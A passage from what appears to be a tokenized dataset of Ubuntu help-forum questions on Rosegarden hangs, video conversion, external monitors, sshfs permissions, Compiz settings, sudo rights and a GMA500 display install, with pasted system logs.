rosegarden : midi/playback_3 port created : rosegarden : midi/capture_3 port created : rosegarden : midi/playback_4 audio file manager emitting fake setvalue ( 100 ) rosegardendocument : :opendocument : successfully opened document `` /home/chase/.local/share/rosegarden/autoload/autoload.rg '' object : :connect : no such slot rosegarden : :audioinstrumentparameterpanel : :updateallboxes ( ) in src/gui/editors/parameters/audioinstrumentparameterpanel.cpp:81 object : :connect : ( receiver name : 'audio instrument parameter panel ' ) object : :connect : no such signal rosegarden : :compositionview : :contentsmoving ( int , int ) in src/gui/editors/segment/compositionview/segmentmover.cpp:58 object : :disconnect : no such signal rosegarden : :compositionview : :contentsmoving ( int , int ) in src/gui/editors/segment/compositionview/segmentmover.cpp:65 object : :connect : no such signal rosegarden : :compositionview : :contentsmoving ( int , int ) in src/gui/editors/segment/compositionview/segmentpencil.cpp:61 connecting my port 3 to 20:0 on reconnection alsadriver : :setplausibleconnection : connection like `` '' requested for device 0 alsadriver : :setplausibleconnection : fuzzy match 20:0 usb uno midi interface midi 1 ( duplex ) available with fitness 1 alsadriver : :setrecorddevice : device 1 , action 0 alsadriver : :setrecorddevice : port is 0:0 alsadriver : :setrecorddevice : device 1 , action 1 alsadriver : :setrecorddevice : port is 20:0 alsadriver : :setrecorddevice - successfully subscribed device 1 as record port alsadriver : :setplausibleconnection : connection like `` '' requested for device 1 alsadriver : :setplausibleconnection : fuzzy match 20:0 usb uno midi interface midi 1 ( duplex ) available with fitness 1 datablockrepository : :clear ( ) studio : :getmetronomefromdevice : having a look at device 1000 studio : :getmetronomefromdevice : having a look at device 10000 studio : :getmetronomefromdevice : having a look at device 0 studio : :getmetronomefromdevice ( 0 ) : device is a midi device rosegarden : could not connect to socket rosegarden : no such file or directory rosegarden : warning : no accurate sequencer timer available ( and kernel is new enough for rtc addendum ) main window display warning : type 2 text < h3 > system timer resolution is too low ! < /h3 > rosegarden : warning : no accurate sequencer timer available ( and kernel is new enough for rtc addendum ) systemfont : :loadsystemfont [ qt ] : wanted family lilypond-feta-rosegarden at size 12 , got family lilypond-feta-rosegarden ( exactmatch 1 ) systemfont : :loadsystemfont [ qt ] : wanted family lilypond-feta-nummer-rosegarden at size 12 , got family lilypond-feta-nummer-rosegarden ( exactmatch 1 ) systemfont : :loadsystemfont [ qt ] : wanted family lilypond-parmesan-rosegarden at size 12 , got family lilypond-parmesan-rosegarden ( exactmatch 1 ) systemfont : :loadsystemfont [ qt ] : wanted family bitstream vera serif at size 12 , got family dejavu serif ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family luxi serif at size 12 , got family dejavu serif ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family times new roman at size 12 , got family liberation serif ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family times at size 12 , got family nimbus roman no9 l ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family fughetta at size 12 , got family dejavu sans ( exactmatch 0 ) warning : unable to load any of the fonts in `` fughetta '' systemfont : :loadsystemfont [ qt ] : wanted family georgia at size 12 , got family dejavu sans ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family inkpen2 at size 12 , got family dejavu sans ( exactmatch 0 ) comparing current version `` 10.10 '' with latest version `` 11.06 '' main window display warning : type 4 text < h3 > newer version available < /h3 > systemfont : :loadsystemfont [ qt ] : wanted family inkpen at size 12 , got family dejavu sans ( exactmatch 0 ) warning : unable to load any of the fonts in `` inkpen2 , inkpen '' systemfont : :loadsystemfont [ qt ] : wanted family inkpen2 text at size 12 , got family dejavu sans ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family inkpen text at size 12 , got family dejavu sans ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family comic sans ms at size 12 , got family dejavu sans ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family maestro at size 12 , got family dejavu sans ( exactmatch 0 ) warning : unable to load any of the fonts in `` maestro '' systemfont : :loadsystemfont [ qt ] : wanted family opus at size 12 , got family dejavu sans ( exactmatch 0 ) warning : unable to load any of the fonts in `` opus '' systemfont : :loadsystemfont [ qt ] : wanted family opus text at size 12 , got family dejavu sans ( exactmatch 0 ) systemfont : :loadsystemfont [ qt ] : wanted family petrucci at size 12 , got family dejavu sans ( exactmatch 0 ) warning : unable to load any of the fonts in `` petrucci '' systemfont : :loadsystemfont [ qt ] : wanted family sonata at size 12 , got family dejavu sans ( exactmatch 0 ) warning : unable to load any of the fonts in `` sonata '' systemfont : :loadsystemfont [ qt ] : wanted family steinberg notation at size 12 , got family dejavu sans ( exactmatch 0 ) warning : unable to load any of the fonts in `` steinberg notation '' systemfont : :loadsystemfont [ qt ] : wanted family xinfonia at size 12 , got family dejavu sans ( exactmatch 0 ) warning : unable to load any of the fonts in `` xinfonia '' alsa client information : 14,0 - ( midi through , midi through port-0 ) ( duplex ) [ ctype 2 , ptype 655362 , cap 99 ] 20,0 - ( usb uno midi interface , usb uno midi interface midi 1 ) ( duplex ) [ ctype 2 , ptype 589826 , cap 127 ] and that 's it . rosegarden just hangs there . every time . i do n't know what could possibly create some sort of error that would persist across a fresh install . it also appears that it ca n't load any fonts for some reason ... .
45025	converting panasonic .mts video into high quality mpeg videos ?	i have been using winff tool to convert panasonic default .mts videos into mpeg videos . however , i am not happy with the quality of the mpeg video output . could some one tell me if there are any other tool for ubuntu or the options that should i use in winff for getting high quality mpeg output .
45026	prevent external monitors from shutting off when laptop lid is closed ?	i 'm running my laptop essentially as a desktop , i have two external monitors hooked up , a bluetooth keyboard , and a wireless usb mouse . it 's plugged into my speaker system as well . what i 'd really like to do is to be able to shut the laptop lid without it automatically disabling video output to my monitors . is there a way i can make this happen by tweaking some configuration value ?
45028	how do i assign a keyboard shortcut that uses altgr as a modifier key ?	i want to assign a command to they keyboard shortcut altgr+n , but every time i try to enter this in the keyboard shortcuts screen , the shortcut is set to iso level3 shift immediately after pressing altgr . what am i doing wrong ?
45029	ubuntu suddenly logged out with no symptoms	recently , i had a strange experiance . i boot up ubuntu and login , start working , after 10-30 minutes ( approx ) , it suddenly logged out , with no symption , very unregular . then , i login again , it seems like the problem only occurred in the first login each day . i 've checked the syslog : may 25 08:52:10 lenik-v anacron [ 1338 ] : job `cron.daily ' terminated may 25 08:52:10 lenik-v anacron [ 1338 ] : job `cron.weekly ' started may 25 08:52:10 lenik-v anacron [ 4861 ] : updated timestamp for job `cron.weekly ' to 2011-05-25 may 25 08:52:16 lenik-v anacron [ 1338 ] : job `cron.weekly ' terminated may 25 08:52:16 lenik-v anacron [ 1338 ] : normal exit ( 2 jobs run ) may 25 08:55:01 lenik-v cron [ 4954 ] : ( lenik ) cmd ( ~/bin/update_pingdb ) may 25 08:58:13 lenik-v kernel : [ 1748.099194 ] warning : `virtualbox ' uses 32-bit capabilities ( legacy support in use ) may 25 09:00:02 lenik-v cron [ 5323 ] : ( lenik ) cmd ( ~/bin/update_pingdb ) may 25 09:05:02 lenik-v cron [ 5835 ] : ( lenik ) cmd ( ~/bin/update_pingdb ) > may 25 09:05:14 lenik-v kernel : [ 2168.696447 ] show_signal_msg : 15 callbacks suppressed > may 25 09:05:14 lenik-v kernel : [ 2168.696460 ] ibus-engine-sun [ 1491 ] : segfault at 19 ip 00000019 sp bfa91bcc error 4 in libsunpinyin.so.3.0 [ 110000+45000 ] > may 25 09:05:17 lenik-v kernel : [ 2172.106725 ] virtualbox [ 5240 ] : segfault at a7309ff0 ip 009959c8 sp bfc23fe0 error 4 in libc-2.13.so [ 966000+15a000 ] may 25 09:05:19 lenik-v networkmanager [ 1220 ] : < info > ( wlan0 ) : device state change : 8 - > 3 ( reason 38 ) may 25 09:05:19 lenik-v networkmanager [ 1220 ] : < info > ( wlan0 ) : deactivating device ( reason : 38 ) . may 25 09:05:19 lenik-v avahi-daemon [ 1216 ] : withdrawing address record for 192.168.1.12 on wlan0 . may 25 09:05:19 lenik-v avahi-daemon [ 1216 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.1.12 . may 25 09:05:19 lenik-v avahi-daemon [ 1216 ] : interface wlan0.ipv4 no longer relevant for mdns . may 25 09:05:19 lenik-v kernel : [ 2174.433437 ] wlan0 : deauthenticating from 00 : c0:02 : f4 : ce : aa by local choice ( reason=3 ) here , i 'm not sure if it 's related to ibus-engine-sun or virtualbox . ibus-engine-sun is a chinese input method , and i run winxp in virtualbox , so both are not optional . but , both should be user application not kernel , is n't it ?
45031	can not write to folder mounted with sshfs	i just created a folder according to sshfs ( ubuntu docs ) sudo apt-get install sshfs sudo gpasswd -a jm fuse sshfs -o idmap=user jm @ example.com : /path/to/folder folder then i found that the folder is mounted , but i can not write to it . the permissions seems fine http : //pastie.org/1969299 but i even tried with chmod -r 777 ./folder still no go update : it seems i ca n't write using netbeans only . but it works with leafpad for example
45034	installed ubuntu 11.04 and now have no frames and/or panels	the day was going fine until i got a notification suggesting that i upgrade to ubuntu 11.04 and i thought , `` sure why not ? '' the first problem was that i did n't like the new desktop , i wanted my old top panel back and the dock removed . so i went into the compiz settings and thinking that turning off unity might restore the old look i did that and now i have no panels or dock . this cut me off from any way i could think of to fix the problem ( i ca n't quite remember but i must have closed the compiz window for some reason ) . so i rebooted and logged back in with ubuntu classic , this was closer to what i wanted but i wanted my spinning cube back , so again i played with the compiz settings . this time i just checked the rotating cube , let the extra needed changes happen , and the frames around all my windows disappeared ! playing with the settings did n't bring them back so i did some googling but the only solution i found was to type `` metacity -- replace '' into a terminal , but this only works as long as i keep the terminal open . so i logged out and logged back in with ubuntu classic no effects and came here . basically , i want to turn compiz back on in regular ubuntu and/or get my frames back in classic ubuntu , or just reset everything .
45035	disable sudo permission to user from command line	i have activated root user in ubuntu and want to use ubuntu as server with no de . for this i want to disable sudo privilege given to first user . how can i do this from command line ? i know i can use a gui but how to do it from command line ?
45037	desktop installation never gets to the graphical stage with a gma500	i am trying to install ubuntu desktop on a hardware-set , which on a similar one , i have successfully installed ubuntu server with no issues . when booting from ubuntu desktop cd it ends up at the ubuntu @ ubuntu $ after failing to display the graphical installation interface . the graphic card is intel scg gma500 video controller the display is *5 '' screen 800*480 lcd* i am seeing the line not using built-in mode `` 640x480 '' ( no mode of this name ) and wonder where can i define my own custom screen resolution in order to move forward . and wonder whether this is the only thing i will have to do below is the output of the xorg.0.log file [ 333.311 ] x.org x server 1.10.1 release date : 2011-04-15 [ 333.311 ] x protocol version 11 , revision 0 [ 333.311 ] build operating system : linux 2.6.24-29-server i686 ubuntu [ 333.311 ] current operating system : linux ubuntu 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:50 utc 2011 i686 [ 333.312 ] kernel command line : file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- maybe-ubiquity [ 333.312 ] build date : 19 april 2011 03:33:17pm [ 333.312 ] xorg-server 2:1.10.1-1ubuntu1 ( for technical support please see http : //www.ubuntu.com/support ) [ 333.312 ] current version of pixman : 0.20.2 [ 333.312 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 333.312 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 333.313 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : wed may 25 03:48:00 2011 [ 333.315 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 333.316 ] ( == ) no layout section . using the first screen section . [ 333.316 ] ( == ) no screen section available . using defaults . [ 333.316 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 333.316 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 333.317 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 333.318 ] ( == ) automatically adding devices [ 333.318 ] ( == ) automatically enabling devices [ 333.318 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 333.318 ] entry deleted from font path . [ 333.318 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 333.318 ] entry deleted from font path . [ 333.318 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 333.318 ] entry deleted from font path . [ 333.319 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 333.319 ] entry deleted from font path . [ 333.319 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 333.319 ] entry deleted from font path . [ 333.319 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 333.319 ] ( == ) modulepath set to `` /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 333.319 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 333.319 ] ( ii ) loader magic : 0x81ffde0 [ 333.319 ] ( ii ) module abi versions : [ 333.319 ] x.org ansi c emulation : 0.4 [ 333.319 ] x.org video driver : 10.0 [ 333.319 ] x.org xinput driver : 12.3 [ 333.319 ] x.org server extension : 5.0 [ 333.322 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:8108:4352:9686 rev 7 , mem @ 0xdff80000/524288 , 0xd0000000/134217728 , 0xdff60000/131072 , i/o @ 0x0000e880/8 [ 333.323 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 333.323 ] ( ii ) loadmodule : `` extmod '' [ 333.328 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 333.329 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 333.329 ] compiled for 1.10.1 , module version = 1.0.0 [ 333.329 ] module class : x.org server extension [ 333.329 ] abi class : x.org server extension , version 5.0 [ 333.329 ] ( ii ) loading extension mit-screen-saver [ 333.329 ] ( ii ) loading extension xfree86-vidmodeextension [ 333.330 ] ( ii ) loading extension xfree86-dga [ 333.330 ] ( ii ) loading extension dpms [ 333.330 ] ( ii ) loading extension xvideo [ 333.330 ] ( ii ) loading extension xvideo-motioncompensation [ 333.330 ] ( ii ) loading extension x-resource [ 333.330 ] ( ii ) loadmodule : `` dbe '' [ 333.333 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 333.333 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 333.333 ] compiled for 1.10.1 , module version = 1.0.0 [ 333.333 ] module class : x.org server extension [ 333.333 ] abi class : x.org server extension , version 5.0 [ 333.333 ] ( ii ) loading extension double-buffer [ 333.334 ] ( ii ) loadmodule : `` glx '' [ 333.336 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 333.337 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 333.337 ] compiled for 1.10.1 , module version = 1.0.0 [ 333.337 ] abi class : x.org server extension , version 5.0 [ 333.338 ] ( == ) aiglx enabled [ 333.338 ] ( ii ) loading extension glx [ 333.338 ] ( ii ) loadmodule : `` record '' [ 333.341 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 333.341 ] ( ii ) module record : vendor= '' x.org foundation '' [ 333.341 ] compiled for 1.10.1 , module version = 1.13.0 [ 333.341 ] module class : x.org server extension [ 333.341 ] abi class : x.org server extension , version 5.0 [ 333.341 ] ( ii ) loading extension record [ 333.341 ] ( ii ) loadmodule : `` dri '' [ 333.344 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 333.345 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 333.346 ] compiled for 1.10.1 , module version = 1.0.0 [ 333.346 ] abi class : x.org server extension , version 5.0 [ 333.346 ] ( ii ) loading extension xfree86-dri [ 333.346 ] ( ii ) loadmodule : `` dri2 '' [ 333.349 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 333.349 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 333.349 ] compiled for 1.10.1 , module version = 1.2.0 [ 333.349 ] abi class : x.org server extension , version 5.0 [ 333.350 ] ( ii ) loading extension dri2 [ 333.350 ] ( == ) matched vesa as autoconfigured driver 0 [ 333.350 ] ( == ) matched fbdev as autoconfigured driver 1 [ 333.350 ] ( == ) assigned the driver to the xf86configlayout [ 333.350 ] ( ii ) loadmodule : `` vesa '' [ 333.352 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 333.353 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 333.353 ] compiled for 1.10.0 , module version = 2.3.0 [ 333.353 ] module class : x.org video driver [ 333.353 ] abi class : x.org video driver , version 10.0 [ 333.353 ] ( ii ) loadmodule : `` fbdev '' [ 333.355 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 333.355 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 333.355 ] compiled for 1.10.0 , module version = 0.4.2 [ 333.355 ] abi class : x.org video driver , version 10.0 [ 333.355 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 333.356 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 333.356 ] ( -- ) using vt number 8 [ 333.378 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 333.378 ] ( ww ) falling back to old probe method for fbdev [ 333.378 ] ( ii ) loading sub module `` fbdevhw '' [ 333.378 ] ( ii ) loadmodule : `` fbdevhw '' [ 333.384 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 333.384 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 333.384 ] compiled for 1.10.1 , module version = 0.0.2 [ 333.384 ] abi class : x.org video driver , version 10.0 [ 333.385 ] ( ee ) open /dev/fb0 : no such file or directory [ 333.385 ] ( ii ) loading sub module `` vbe '' [ 333.385 ] ( ii ) loadmodule : `` vbe '' [ 333.388 ] ( ii ) loading /usr/lib/xorg/modules/libvbe.so [ 333.388 ] ( ii ) module vbe : vendor= '' x.org foundation '' [ 333.388 ] compiled for 1.10.1 , module version = 1.1.0 [ 333.388 ] abi class : x.org video driver , version 10.0 [ 333.389 ] ( ii ) loading sub module `` int10 '' [ 333.389 ] ( ii ) loadmodule : `` int10 '' [ 333.391 ] ( ii ) loading /usr/lib/xorg/modules/libint10.so [ 333.392 ] ( ii ) module int10 : vendor= '' x.org foundation '' [ 333.392 ] compiled for 1.10.1 , module version = 1.0.0 [ 333.392 ] abi class : x.org video driver , version 10.0 [ 333.392 ] ( ii ) vesa ( 0 ) : initializing int10 [ 333.401 ] ( ii ) vesa ( 0 ) : bad v_bios checksum [ 333.401 ] ( ii ) vesa ( 0 ) : primary v_bios segment is : 0xc000 [ 333.402 ] ( ii ) vesa ( 0 ) : vesa bios detected [ 333.402 ] ( ii ) vesa ( 0 ) : vesa vbe version 3.0 [ 333.402 ] ( ii ) vesa ( 0 ) : vesa vbe total mem : 8000 kb [ 333.402 ] ( ii ) vesa ( 0 ) : vesa vbe oem : intel ( r ) poulsbo graphics chip accelerated vga bios [ 333.402 ] ( ii ) vesa ( 0 ) : vesa vbe oem software rev : 1.0 [ 333.402 ] ( ii ) vesa ( 0 ) : vesa vbe oem vendor : intel corporation [ 333.402 ] ( ii ) vesa ( 0 ) : vesa vbe oem product : intel ( r ) poulsbo graphics controller [ 333.402 ] ( ii ) vesa ( 0 ) : vesa vbe oem product rev : hardware version 0.0 [ 333.449 ] ( ii ) vesa ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 333.449 ] ( == ) vesa ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 333.449 ] ( == ) vesa ( 0 ) : rgb weight 888 [ 333.449 ] ( == ) vesa ( 0 ) : default visual is truecolor [ 333.449 ] ( == ) vesa ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 333.449 ] ( ii ) loading sub module `` ddc '' [ 333.449 ] ( ii ) loadmodule : `` ddc '' [ 333.449 ] ( ii ) module `` ddc '' already built-in [ 333.520 ] ( ii ) vesa ( 0 ) : vesa vbe ddc supported [ 333.520 ] ( ii ) vesa ( 0 ) : vesa vbe ddc level none [ 333.520 ] ( ii ) vesa ( 0 ) : vesa vbe ddc transfer in appr . 0 sec . [ 333.521 ] ( ii ) vesa ( 0 ) : vesa vbe ddc read failed [ 333.522 ] ( ii ) vesa ( 0 ) : vesa vbe panelid read successfully [ 333.522 ] ( ii ) vesa ( 0 ) : panelid returned panel resolution 800x480 [ 333.522 ] ( ii ) vesa ( 0 ) : searching for matching vesa mode ( s ) : [ 333.523 ] mode : 160 ( 0x0 ) [ 333.523 ] modeattributes : 0x0 [ 333.523 ] winaattributes : 0x0 [ 333.523 ] winbattributes : 0x0 [ 333.523 ] wingranularity : 0 [ 333.523 ] winsize : 0 [ 333.523 ] winasegment : 0x0 [ 333.523 ] winbsegment : 0x0 [ 333.523 ] winfuncptr : 0x0 [ 333.523 ] bytesperscanline : 0 [ 333.523 ] xresolution : 0 [ 333.523 ] yresolution : 0 [ 333.523 ] xcharsize : 0 [ 333.523 ] ycharsize : 0 [ 333.523 ] numberofplanes : 0 [ 333.523 ] bitsperpixel : 0 [ 333.523 ] numberofbanks : 0 [ 333.523 ] memorymodel : 0 [ 333.523 ] banksize : 0 [ 333.523 ] numberofimages : 0 [ 333.523 ] redmasksize : 0 [ 333.523 ] redfieldposition : 0 [ 333.523 ] greenmasksize : 0 [ 333.523 ] greenfieldposition : 0 [ 333.523 ] bluemasksize : 0 [ 333.523 ] bluefieldposition : 0 [ 333.523 ] rsvdmasksize : 0 [ 333.523 ] rsvdfieldposition : 0 [ 333.523 ] directcolormodeinfo : 0 [ 333.523 ] physbaseptr : 0x0 [ 333.523 ] linbytesperscanline : 0 [ 333.523 ] bnknumberofimagepages : 0 [ 333.523 ] linnumberofimagepages : 0 [ 333.523 ] linredmasksize : 0 [ 333.523 ] linredfieldposition : 0 [ 333.523 ] lingreenmasksize : 0 [ 333.523 ] lingreenfieldposition : 0 [ 333.523 ] linbluemasksize : 0 [ 333.524 ] linbluefieldposition : 0 [ 333.524 ] linrsvdmasksize : 0 [ 333.524 ] linrsvdfieldposition : 0 [ 333.524 ] maxpixelclock : 0 [ 333.524 ] mode : 161 ( 0x0 ) ... ... ... [ 333.582 ] mode : 117 ( 0x0 ) [ 333.582 ] modeattributes : 0x0 [ 333.582 ] winaattributes : 0x0 [ 333.582 ] winbattributes : 0x0 [ 333.582 ] wingranularity : 0 [ 333.582 ] winsize : 0 [ 333.582 ] winasegment : 0x0 [ 333.582 ] winbsegment : 0x0 [ 333.582 ] winfuncptr : 0x0 [ 333.582 ] bytesperscanline : 0 [ 333.582 ] xresolution : 0 [ 333.582 ] yresolution : 0 [ 333.582 ] xcharsize : 0 [ 333.582 ] ycharsize : 0 [ 333.582 ] numberofplanes : 0 [ 333.582 ] bitsperpixel : 0 [ 333.582 ] numberofbanks : 0 [ 333.582 ] memorymodel : 0 [ 333.582 ] banksize : 0 [ 333.582 ] numberofimages : 0 [ 333.583 ] redmasksize : 0 [ 333.583 ] redfieldposition : 0 [ 333.583 ] greenmasksize : 0 [ 333.583 ] greenfieldposition : 0 [ 333.583 ] bluemasksize : 0 [ 333.583 ] bluefieldposition : 0 [ 333.583 ] rsvdmasksize : 0 [ 333.583 ] rsvdfieldposition : 0 [ 333.583 ] directcolormodeinfo : 0 [ 333.583 ] physbaseptr : 0x0 [ 333.583 ] linbytesperscanline : 0 [ 333.583 ] bnknumberofimagepages : 0 [ 333.583 ] linnumberofimagepages : 0 [ 333.583 ] linredmasksize : 0 [ 333.583 ] linredfieldposition : 0 [ 333.583 ] lingreenmasksize : 0 [ 333.583 ] lingreenfieldposition : 0 [ 333.583 ] linbluemasksize : 0 [ 333.583 ] linbluefieldposition : 0 [ 333.583 ] linrsvdmasksize : 0 [ 333.583 ] linrsvdfieldposition : 0 [ 333.583 ] maxpixelclock : 0 [ 333.585 ] mode : 118 ( 0x0 ) [ 333.585 ] modeattributes : 0x0 [ 333.585 ] winaattributes : 0x0 [ 333.585 ] winbattributes : 0x0 [ 333.585 ] wingranularity : 0 [ 333.585 ] winsize : 0 [ 333.585 ] winasegment : 0x0 [ 333.585 ] winbsegment : 0x0 [ 333.585 ] winfuncptr : 0x0 [ 333.585 ] bytesperscanline : 0 [ 333.585 ] xresolution : 0 [ 333.585 ] yresolution : 0 [ 333.585 ] xcharsize : 0 [ 333.585 ] ycharsize : 0 [ 333.585 ] numberofplanes : 0 [ 333.585 ] bitsperpixel : 0 [ 333.585 ] numberofbanks : 0 [ 333.585 ] memorymodel : 0 [ 333.585 ] banksize : 0 [ 333.585 ] numberofimages : 0 [ 333.585 ] redmasksize : 0 [ 333.585 ] redfieldposition : 0 [ 333.585 ] greenmasksize : 0 [ 333.585 ] greenfieldposition : 0 [ 333.585 ] bluemasksize : 0 [ 333.585 ] bluefieldposition : 0 [ 333.585 ] rsvdmasksize : 0 [ 333.585 ] rsvdfieldposition : 0 [ 333.585 ] directcolormodeinfo : 0 [ 333.585 ] physbaseptr : 0x0 [ 333.586 ] linbytesperscanline : 0 [ 333.586 ] bnknumberofimagepages : 0 [ 333.586 ] linnumberofimagepages : 0 [ 333.586 ] linredmasksize : 0 [ 333.586 ] linredfieldposition : 0 [ 333.586 ] lingreenmasksize : 0 [ 333.586 ] lingreenfieldposition : 0 [ 333.586 ] linbluemasksize : 0 [ 333.586 ] linbluefieldposition : 0 [ 333.586 ] linrsvdmasksize : 0 [ 333.586 ] linrsvdfieldposition : 0 [ 333.586 ] maxpixelclock : 0 [ 333.589 ] *mode : 112 ( 640x480 ) [ 333.589 ] modeattributes : 0x9b [ 333.589 ] winaattributes : 0x7 [ 333.589 ] winbattributes : 0x0 [ 333.589 ] wingranularity : 64 [ 333.589 ] winsize : 64 [ 333.589 ] winasegment : 0xa000 [ 333.589 ] winbsegment : 0x0 [ 333.589 ] winfuncptr : 0xc00081fb [ 333.590 ] bytesperscanline : 2560 [ 333.590 ] xresolution : 640 [ 333.590 ] yresolution : 480 [ 333.590 ] xcharsize : 8 [ 333.590 ] ycharsize : 16 [ 333.590 ] numberofplanes : 1 [ 333.590 ] bitsperpixel : 32 [ 333.590 ] numberofbanks : 1 [ 333.590 ] memorymodel : 6 [ 333.590 ] banksize : 0 [ 333.590 ] numberofimages : 5 [ 333.590 ] redmasksize : 8 [ 333.590 ] redfieldposition : 16 [ 333.590 ] greenmasksize : 8 [ 333.590 ] greenfieldposition : 8 [ 333.590 ] bluemasksize : 8 [ 333.590 ] bluefieldposition : 0 [ 333.590 ] rsvdmasksize : 8 [ 333.590 ] rsvdfieldposition : 24 [ 333.590 ] directcolormodeinfo : 0 [ 333.590 ] physbaseptr : 0x7f800000 [ 333.590 ] linbytesperscanline : 2560 [ 333.590 ] bnknumberofimagepages : 5 [ 333.590 ] linnumberofimagepages : 5 [ 333.590 ] linredmasksize : 8 [ 333.590 ] linredfieldposition : 16 [ 333.590 ] lingreenmasksize : 8 [ 333.590 ] lingreenfieldposition : 8 [ 333.590 ] linbluemasksize : 8 [ 333.590 ] linbluefieldposition : 0 [ 333.590 ] linrsvdmasksize : 8 [ 333.590 ] linrsvdfieldposition : 24 [ 333.590 ] maxpixelclock : 230000000 [ 333.592 ] mode : 114 ( 0x0 ) [ 333.592 ] modeattributes : 0x0 [ 333.592 ] winaattributes : 0x0 [ 333.592 ] winbattributes : 0x0 [ 333.592 ] wingranularity : 0 [ 333.592 ] winsize : 0 [ 333.592 ] winasegment : 0x0 [ 333.592 ] winbsegment : 0x0 [ 333.592 ] winfuncptr : 0x0 [ 333.592 ] bytesperscanline : 0 [ 333.592 ] xresolution : 0 [ 333.592 ] yresolution : 0 [ 333.592 ] xcharsize : 0 [ 333.592 ] ycharsize : 0 [ 333.592 ] numberofplanes : 0 [ 333.592 ] bitsperpixel : 0 [ 333.592 ] numberofbanks : 0 [ 333.592 ] memorymodel : 0 [ 333.592 ] banksize : 0 [ 333.592 ] numberofimages : 0 [ 333.592 ] redmasksize : 0 [ 333.592 ] redfieldposition : 0 [ 333.592 ] greenmasksize : 0 [ 333.592 ] greenfieldposition : 0 [ 333.592 ] bluemasksize : 0 [ 333.592 ] bluefieldposition : 0 [ 333.592 ] rsvdmasksize : 0 [ 333.592 ] rsvdfieldposition : 0 [ 333.592 ] directcolormodeinfo : 0 [ 333.592 ] physbaseptr : 0x0 [ 333.592 ] linbytesperscanline : 0 [ 333.593 ] bnknumberofimagepages : 0 [ 333.593 ] linnumberofimagepages : 0 [ 333.593 ] linredmasksize : 0 [ 333.593 ] linredfieldposition : 0 [ 333.593 ] lingreenmasksize : 0 [ 333.593 ] lingreenfieldposition : 0 [ 333.593 ] linbluemasksize : 0 [ 333.593 ] linbluefieldposition : 0 [ 333.593 ] linrsvdmasksize : 0 [ 333.593 ] linrsvdfieldposition : 0 [ 333.593 ] maxpixelclock : 0 [ 333.594 ] mode : 115 ( 0x0 ) [ 333.595 ] modeattributes : 0x0 [ 333.595 ] winaattributes : 0x0 [ 333.595 ] winbattributes : 0x0 [ 333.595 ] wingranularity : 0 [ 333.595 ] winsize : 0 [ 333.595 ] winasegment : 0x0 [ 333.595 ] winbsegment : 0x0 [ 333.595 ] winfuncptr : 0x0 [ 333.595 ] bytesperscanline : 0 [ 333.595 ] xresolution : 0 [ 333.595 ] yresolution : 0 [ 333.595 ] xcharsize : 0 [ 333.595 ] ycharsize : 0 [ 333.595 ] numberofplanes : 0 [ 333.595 ] bitsperpixel : 0 [ 333.595 ] numberofbanks : 0 [ 333.595 ] memorymodel : 0 [ 333.595 ] banksize : 0 [ 333.595 ] numberofimages : 0 [ 333.595 ] redmasksize : 0 [ 333.595 ] redfieldposition : 0 [ 333.595 ] greenmasksize : 0 [ 333.595 ] greenfieldposition : 0 